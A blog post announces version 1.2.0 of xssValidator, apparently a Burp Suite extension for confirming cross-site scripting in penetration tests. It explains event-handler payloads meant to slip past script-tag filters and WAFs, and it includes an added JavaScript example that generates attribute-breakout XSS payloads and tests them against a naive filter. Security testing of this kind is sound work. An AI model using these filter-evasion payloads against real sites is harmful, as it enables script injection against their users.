29 Aug, 2014

xssValidator v1.2.0 Released

by John Poulin

It has been quite a while since you’ve heard anything new about xssValidator, but today we bring good news! Version 1.2.0 has been released with some significant modifications.

Mouse Events:

As consultants, we tend to see more and more applications being developed that leverage clever client-side technologies to make the user experience more meaningful. These features normally utilize JavaScript functions that execute when a user clicks a button, when a user hovers on some object, or when other events occur.

Thanks to @f-block, xssValidator can now build payloads around specific JavaScript event handlers, such as onmouseover, that are placed as attributes on an HTML element rather than inside a <script> block. As an attacker, this lets us avoid <script> tags, which a WAF or a naive tag filter is likely to catch, while an event-handler attribute on an existing element often passes through.

Within the payload definition panel (yes, that’s new, too!), we provide instructions for creating payloads with event handlers, but it’s as simple as this: {EVENTHANDLER}={JAVASCRIPT}
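The following is an added example, not code from xssValidator, showing how the {EVENTHANDLER}={JAVASCRIPT} convention expands into concrete attribute-context payloads and why they matter against a script-tag filter. The handler list, JavaScript function list, attribute breakout strings and the toy filter are all assumptions made for the example; the extension's real defaults and any real WAF will differ.

```javascript
// Added example (not xssValidator's own code): expand the
// {EVENTHANDLER}={JAVASCRIPT} payload convention into concrete payloads and
// check them against a naive <script>-stripping filter.

// Assumed lists for illustration; the extension's shipped defaults may differ.
const EVENT_HANDLERS = ['onmouseover', 'onmouseenter', 'onfocus', 'onerror'];
const JS_FUNCTIONS = ['alert(1)', 'confirm(document.domain)'];

// Assumed attribute-context breakouts: the reflection lands inside a
// double-quoted, single-quoted, or unquoted attribute value, so the payload
// closes that value, adds the handler, and opens a dummy attribute to
// swallow the trailing quote.
const CONTEXTS = {
  doubleQuoted: p => `" ${p} x="`,
  singleQuoted: p => `' ${p} x='`,
  unquoted: p => ` ${p} x=`,
};

// Fill the two placeholders of a payload template.
function expandTemplate(template, handler, js) {
  return template.replace('{EVENTHANDLER}', handler).replace('{JAVASCRIPT}', js);
}

// Cartesian product of handlers x functions x contexts, in a stable order.
function generatePayloads(template, handlers, functions, contexts) {
  const out = [];
  for (const handler of handlers) {
    for (const js of functions) {
      const base = expandTemplate(template, handler, js);
      for (const [context, wrap] of Object.entries(contexts)) {
        out.push({ handler, js, context, payload: wrap(base) });
      }
    }
  }
  return out;
}

// A naive filter of the kind the post alludes to: it strips <script> tags
// (case-insensitive, with or without attributes) and nothing else.
function naiveScriptFilter(input) {
  return input.replace(/<\s*\/?\s*script\b[^>]*>/gi, '');
}

// True if the filter returns the payload unchanged.
function survivesFilter(payload, filter) {
  return filter(payload) === payload;
}

// Stand-alone demo: print each payload and whether the toy filter passes it.
function demo() {
  const template = '{EVENTHANDLER}={JAVASCRIPT}';
  const scriptPayload = '<script>alert(1)</script>';
  console.log(`${scriptPayload} survives: ${survivesFilter(scriptPayload, naiveScriptFilter)}`);
  for (const p of generatePayloads(template, EVENT_HANDLERS, JS_FUNCTIONS, CONTEXTS)) {
    console.log(`[${p.context}] ${p.payload} survives: ${survivesFilter(p.payload, naiveScriptFilter)}`);
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  demo();
}
```

Surviving a filter only means the payload reaches the page intact; whether the handler fires still depends on an event reaching the element, which is exactly why the detector has to simulate mouse events rather than just grep the response.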

The Phantom.JS xss-detector script has been modified to support testing of event handling. When the detector is evaluating a page, it will now simulate hovering over each element of the page in an attempt to trigger events.

Currently the Slimer.JS xss-detector does not support this functionality; however, it is on the roadmap for version 1.2.1.

Enhanced GUI:

In this release we also spent some time (more than 30 minutes ;)) building a more useful GUI for the xssValidator tab.  It’s still not where we want it to be in terms of design and functionality, but it’s definitely a step in the right direction.

We’ve added the ability to view, modify, and create new payloads dynamically, right through the interface. Previously, if our users wanted to modify payloads, they would have to actually modify and recompile the source code, which isn’t very friendly. Most of our users install the plugin through the BApp store and don’t have the source readily available to them.

Along with the payload definition panel, we added the ability to define custom JavaScript functions and event handlers directly within the interface. Unfortunately, it will still be necessary to modify the xss-detectors to support any new functions or event handlers, since the detector is what recognizes that a given function actually executed.

And most importantly, we added instructions! Because this extender requires external services (Phantom.JS / Slimer.JS), it's important for users to have instructions. Please note that the extender will run without the services, but then there is no execution-based confirmation, so that's the same as running Burp Intruder with an XSS payload list.

As always, please let me know if you have any questions or concerns. This update was submitted to the BApp store and should be live within a few days. For the time being, please download the v1.2.0 release from our repository.

John Poulin is an application security consultant for nVisium who specializes in web application security. He worked previously as a web developer and software engineer who focused on building multi-tier web applications. When he's not hacking on web apps, John spends his time building tools to help him hack on web apps! You can find him on twitter: @forced_request and on myspace: REDACTED.